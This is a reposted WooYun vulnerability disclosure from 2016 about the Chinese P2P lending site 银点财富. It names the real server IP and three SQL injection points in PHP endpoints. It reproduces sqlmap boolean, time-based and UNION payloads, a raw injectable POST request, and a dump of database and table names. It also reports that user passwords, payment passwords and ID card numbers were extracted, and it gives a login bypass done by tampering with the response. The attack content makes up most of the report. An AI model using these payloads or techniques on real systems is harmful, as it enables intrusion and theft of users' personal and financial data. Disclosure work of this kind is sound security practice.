p2p金融安全之银点财富漏洞打包(影响数万成员信息安全含身份证/支付密码等) admin 141454文章 117评论 2017年3月25日22:22:11评论289 views字数 247阅读0分49秒阅读模式 摘要2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开 漏洞概要 关注数(2) 关注此漏洞 缺陷编号: WooYun-2016-186904 漏洞标题: p2p金融安全之银点财富漏洞打包(影响数万成员信息安全含身份证/支付密码等) 相关厂商: 银点财富 漏洞作者: 路人甲 提交时间: 2016-03-21 12:32 公开时间: 2016-05-05 12:32 漏洞类型: SQL注射漏洞 危害等级: 高 自评Rank: 20 漏洞状态: 未联系到厂商或者厂商积极忽略 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: php+数字类型注射 php+字符类型注射 0人收藏 漏洞详情 披露状态: 2016-03-21: 积极联系厂商并且等待厂商认领中,细节不对外公开 2016-05-05: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 漏洞这么多也不怕数据被盗 详细说明: code 区域 http://180.97.80.205/ #1注入点1,id参数 code 区域 http://180.97.80.205/appaction/bao_detail.php?id=51&time=0.9278282364830375 sqlmap跑的时候去掉提么参数,否则会报错 code 区域 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=51 AND 5254=5254 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE) Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- web application technology: PHP 5.4.41 back-end DBMS: MySQL 5.0.12 sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=51 AND 5254=5254 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE) Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- web application technology: PHP 5.4.41 back-end DBMS: MySQL 5.0.12 sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=51 AND 5254=5254 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=51 AND (SELECT * FROM (SELECT(SLEEP(5)))qvnE) Type: UNION query Title: Generic UNION query (NULL) - 15 columns Payload: id=-8819 UNION ALL SELECT NULL,CONCAT(0x7178717871,0x68486753634d4558417247794c514e56784d5456716e53596450564441425746676f72724b4c5a69,0x717a6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- web application technology: PHP 5.4.41 back-end DBMS: MySQL 5.0.12 available databases [6]: [*] information_schema [*] mysql [*] performance_schema [*] sq_phpcms [*] sq_shangyu [*] sq_yindian 主要数据在最后三个库里面 code 区域 Database: sq_yindian +-----------------------+---------+ | Table | Entries | +-----------------------+---------+ | dw_account_log | 29623 | | dw_user_sendemail_log | 21667 | | dw_message | 15222 | | dw_account_recharge | 9664 | | dw_borrow_collection | 7980 | | dw_friends | 7723 | | dw_user_log | 7599 | | dw_credit_log | 6407 | | sendlog | 4240 | | dw_user_amount | 4143 | | dw_user_cache | 4132 | | dw_user | 4120 | | dw_borrow_tender_log | 3896 | | dw_area | 3579 | | dw_borrow_tender | 3460 | | dw_prize_order | 2584 | | dw_account_cash | 1514 | | dw_credit | 1424 | | dw_account | 947 | | dw_userinfo | 813 | | dw_article | 778 | | dw_account_bank | 752 | | dw_article_fields | 717 | | dw_linkage | 521 | | dw_user_amountlog | 485 | | dw_borrow_repayment | 420 | | dw_cache | 414 | | dw_cityinfo | 380 | | dw_userlog_recharge | 376 | | dw_upfiles | 368 | | dw_everyday | 285 | | dw_user_backup | 253 | | dw_borrow | 228 | | dw_daizi | 162 | | dw_user_trend | 136 | | dw_user_amountapply | 106 | | dw_system | 88 | | dw_site | 86 | | dw_linkage_type | 42 | | dw_attestation_type | 40 | | dw_remind | 28 | | dw_bbs_posts | 26 | | dw_attestation | 24 | | dw_module | 23 | | dw_gongan_jk | 18 | | dw_links | 16 | | dw_user_type | 16 | | dw_bbs_topics | 14 | | dw_credit_type | 14 | | dw_scrollpic | 12 | | dw_bbs_forums | 10 | | dw_borrow_auto | 9 | | dw_bbs_credits | 8 | | dw_credit_rank | 6 | | dw_invite_type | 5 | | dw_online | 5 | | dw_prize | 5 | | dw_liuyan_set | 4 | | dw_report_users | 4 | | dw_flag | 3 | | dw_friends_request | 3 | | dw_remind_type | 3 | | dw_report_roles | 3 | | dw_scrollpic_type | 3 | | dw_links_type | 2 | | dw_log | 2 | | dw_payment | 2 | | dw_ad | 1 | | dw_bbs_settings | 1 | | dw_borrow_editlog | 1 | | dw_editor | 1 | | dw_fields | 1 | +-----------------------+---------+ 只做演示,跑出了三条数据,有登录密码,支付密码,身份证号,邮箱等信息 code 区域 涉及支付密码 #2另一处SQL注入是手机端摇一摇界面,基于时间的注入 code 区域 http://180.97.80.205/appaction/yaoyiyao.php?uid=1 #第三处SQL注入 code 区域 POST http://180.97.80.205/appaction/phone_action.php HTTP/1.1 Host: 180.97.80.205 Connection: keep-alive Content-Length: 15 Accept: */* Origin: file:// X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L720T Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip,deflate Accept-Language: zh-CN,en-US;q=0.8 data=null%5D%5B* 漏洞证明: #3逻辑漏洞 手机端登陆界面,简单的不能再简陋了,验证码没有,明文传输,这个如果爆破的话相信只是时间的问题 登陆的时候抓返包,修改返回包为1 数百个推荐记录 修复方案: 从服务器端验证登录状态 网站多个参数存在注入,建议找专人好好排查一下 版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应: 未能联系到厂商或者厂商积极拒绝 漏洞Rank:15 (WooYun评价) 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评价 免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。 点赞 https://cn-sec.com/archives/8059.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论